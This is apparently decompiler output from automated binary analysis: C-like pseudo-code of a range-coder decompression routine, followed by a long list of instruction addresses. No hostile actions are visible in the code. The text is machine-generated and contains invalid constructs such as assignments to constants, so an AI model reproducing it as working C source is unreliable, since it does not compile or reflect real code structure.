											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                                                              0x00000000
                                                                                              0x00407395
                                                                                              0x00407395
                                                                                              0x00407399
                                                                                              0x004073be
                                                                                              0x004073c8
                                                                                              0x00000000
                                                                                              0x0040739b
                                                                                              0x0040739b
                                                                                              0x0040739e
                                                                                              0x004073a2
                                                                                              0x004073a5
                                                                                              0x004073a8
                                                                                              0x004073ac
                                                                                              0x004073ac
                                                                                              0x004073af
                                                                                              0x00407489
                                                                                              0x00407489
                                                                                              0x00407490
                                                                                              0x00407490
                                                                                              0x00407493
                                                                                              0x0040749a
                                                                                              0x004074c7
                                                                                              0x004074cb
                                                                                              0x0040752b
                                                                                              0x0040752e
                                                                                              0x00407533
                                                                                              0x00407534
                                                                                              0x00407536
                                                                                              0x00407538
                                                                                              0x0040753b
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00407447
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406be3
                                                                                              0x00406bec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x00000000
                                                                                              0x00406bfd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c06
                                                                                              0x00406c09
                                                                                              0x00406c0c
                                                                                              0x00406c10
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c16
                                                                                              0x00406c19
                                                                                              0x00406c1b
                                                                                              0x00406c1c
                                                                                              0x00406c1f
                                                                                              0x00406c21
                                                                                              0x00406c22
                                                                                              0x00406c24
                                                                                              0x00406c27
                                                                                              0x00406c2c
                                                                                              0x00406c31
                                                                                              0x00406c3a
                                                                                              0x00406c4d
                                                                                              0x00406c50
                                                                                              0x00406c5c
                                                                                              0x00406c84
                                                                                              0x00406c86
                                                                                              0x00406c94
                                                                                              0x00406c94
                                                                                              0x00406c98
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c88
                                                                                              0x00406c8b
                                                                                              0x00406c8c
                                                                                              0x00406c8c
                                                                                              0x00000000
                                                                                              0x00406c88
                                                                                              0x00406c62
                                                                                              0x00406c67
                                                                                              0x00406c67
                                                                                              0x00406c70
                                                                                              0x00406c78
                                                                                              0x00406c7b
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c81
                                                                                              0x00000000
                                                                                              0x00406c9e
                                                                                              0x00406c9e
                                                                                              0x00406ca2
                                                                                              0x0040754e
                                                                                              0x00000000
                                                                                              0x0040754e
                                                                                              0x00406cab
                                                                                              0x00406cbb
                                                                                              0x00406cbe
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc1
                                                                                              0x00406cc4
                                                                                              0x00406cc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406cca
                                                                                              0x00406cd0
                                                                                              0x00406cfa
                                                                                              0x00406d00
                                                                                              0x00406d07
                                                                                              0x00000000
                                                                                              0x00406d07
                                                                                              0x00406cd6
                                                                                              0x00406cd9
                                                                                              0x00406cde
                                                                                              0x00406cde
                                                                                              0x00406ce9
                                                                                              0x00406cf1
                                                                                              0x00406cf4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d39
                                                                                              0x00406d3f
                                                                                              0x00406d42
                                                                                              0x00406d4f
                                                                                              0x00406d57
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406d0e
                                                                                              0x00406d0e
                                                                                              0x00406d12
                                                                                              0x0040755d
                                                                                              0x00000000
                                                                                              0x0040755d
                                                                                              0x00406d1e
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d29
                                                                                              0x00406d2c
                                                                                              0x00406d2f
                                                                                              0x00406d32
                                                                                              0x00406d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004073ce
                                                                                              0x004073ce
                                                                                              0x004073d4
                                                                                              0x004073da
                                                                                              0x004073e0
                                                                                              0x004073fa
                                                                                              0x004073fd
                                                                                              0x00407403
                                                                                              0x0040740e
                                                                                              0x0040740e
                                                                                              0x00407410
                                                                                              0x004073e2
                                                                                              0x004073e2
